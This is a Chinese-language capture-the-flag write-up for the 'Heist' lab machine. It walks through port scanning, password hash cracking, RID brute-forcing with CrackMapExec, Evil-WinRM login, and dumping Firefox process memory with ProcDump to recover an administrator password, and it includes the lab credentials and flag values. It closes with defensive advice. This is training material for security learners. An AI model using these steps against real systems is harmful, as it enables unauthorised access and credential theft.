[Meachines] [Easy] Heist Cisco crack+RID Brute+ProcDump转存储权限提升
字数 984 2025-08-22 12:23:36

Cisco 密码破解与 RID 暴力破解 + ProcDump 转储权限提升技术文档

1. 信息收集阶段

1.1 目标扫描

目标IP: 10.10.10.149

使用命令检查目标是否在线:

ip='10.10.10.149'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";

1.2 端口扫描结果

开放端口:

  • 80/tcp: Microsoft IIS httpd 10.0
  • 135/tcp: Microsoft Windows RPC
  • 445/tcp: microsoft-ds
  • 5985/tcp: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • 49669/tcp: Microsoft Windows RPC

详细扫描命令:

ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
nmap -Pn -sV -sC -p "$ports" "$ip"

2. Web应用分析

2.1 登录页面发现

登录页面URL: http://10.10.10.149/login.php

2.2 获取的凭据

通过分析发现以下凭据:

username: rout3r
password: $uperP@ssword

username: admin
password: Q4)sJu\Y8qz*A3?d

3. 密码破解技术

3.1 使用John the Ripper破解哈希

命令示例:

john hash --wordlist=/home/maptnh/Desktop/rockyou.txt --fork=4

破解结果:

username: hazard
password: stealth1agent

3.2 使用CrackMapExec验证SMB凭据

基本命令:

crackmapexec smb 10.10.10.149 -u user -p pass

使用破解的凭据:

crackmapexec smb 10.10.10.149 -u 'hazard' -p 'stealth1agent'

4. RID 暴力破解

4.1 执行RID暴力破解

命令:

crackmapexec smb 10.10.10.149 -u 'hazard' -p 'stealth1agent' --rid-brute

4.2 获取的有效凭据

通过RID暴力破解获得的凭据:

username: Chase
password: Q4)sJu\Y8qz*A3?d

5. 初始访问

5.1 使用Evil-WinRM连接

命令:

evil-winrm -i 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'

5.2 获取用户标志

用户标志位置:

C:\Users\Chase\Desktop\User.txt

内容:

36b51bb5b3adc73e993df616c34e0ca8

6. 权限提升技术

6.1 使用ProcDump进行内存转储

6.1.1 上传ProcDump工具

在Evil-WinRM会话中:

upload ../home/maptnh/Desktop/htb/procdump64.exe ./

6.1.2 查找目标进程

查找Firefox进程:

Get-Process -Name firefox | Select-Object Id, ProcessName

假设找到的进程ID为6220

6.1.3 执行内存转储

.\procdump64.exe -ma 6220 C:\Users\Chase\Desktop\res.dmp

6.1.4 下载转储文件

download res.dmp /tmp/res.dmp

6.1.5 分析转储文件

在本地分析转储文件:

strings res.dmp|grep login_password

发现敏感信息:

password:4dD!5}x/re8]FBuZ

6.2 获取root标志

root标志位置:

C:\Users\Administrator\Desktop\Root.txt

内容:

f2c7b7a831c8a87f285e1893307cd644

7. 关键工具总结

  1. Nmap/Masscan: 端口扫描
  2. John the Ripper: 密码哈希破解
  3. CrackMapExec: SMB协议测试和RID暴力破解
  4. Evil-WinRM: Windows远程管理
  5. ProcDump: Windows进程内存转储工具

8. 安全建议

  1. 避免使用弱密码或默认密码
  2. 限制RPC和SMB服务的访问
  3. 定期更新和修补系统
  4. 监控进程内存中的敏感信息
  5. 限制对ProcDump等调试工具的使用
Cisco 密码破解与 RID 暴力破解 + ProcDump 转储权限提升技术文档 1. 信息收集阶段 1.1 目标扫描 目标IP: 10.10.10.149 使用命令检查目标是否在线: 1.2 端口扫描结果 开放端口: 80/tcp: Microsoft IIS httpd 10.0 135/tcp: Microsoft Windows RPC 445/tcp: microsoft-ds 5985/tcp: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49669/tcp: Microsoft Windows RPC 详细扫描命令: 2. Web应用分析 2.1 登录页面发现 登录页面URL: http://10.10.10.149/login.php 2.2 获取的凭据 通过分析发现以下凭据: 3. 密码破解技术 3.1 使用John the Ripper破解哈希 命令示例: 破解结果: 3.2 使用CrackMapExec验证SMB凭据 基本命令: 使用破解的凭据: 4. RID 暴力破解 4.1 执行RID暴力破解 命令: 4.2 获取的有效凭据 通过RID暴力破解获得的凭据: 5. 初始访问 5.1 使用Evil-WinRM连接 命令: 5.2 获取用户标志 用户标志位置: 内容: 6. 权限提升技术 6.1 使用ProcDump进行内存转储 6.1.1 上传ProcDump工具 在Evil-WinRM会话中: 6.1.2 查找目标进程 查找Firefox进程: 假设找到的进程ID为6220 6.1.3 执行内存转储 6.1.4 下载转储文件 6.1.5 分析转储文件 在本地分析转储文件: 发现敏感信息: 6.2 获取root标志 root标志位置: 内容: 7. 关键工具总结 Nmap/Masscan : 端口扫描 John the Ripper : 密码哈希破解 CrackMapExec : SMB协议测试和RID暴力破解 Evil-WinRM : Windows远程管理 ProcDump : Windows进程内存转储工具 8. 安全建议 避免使用弱密码或默认密码 限制RPC和SMB服务的访问 定期更新和修补系统 监控进程内存中的敏感信息 限制对ProcDump等调试工具的使用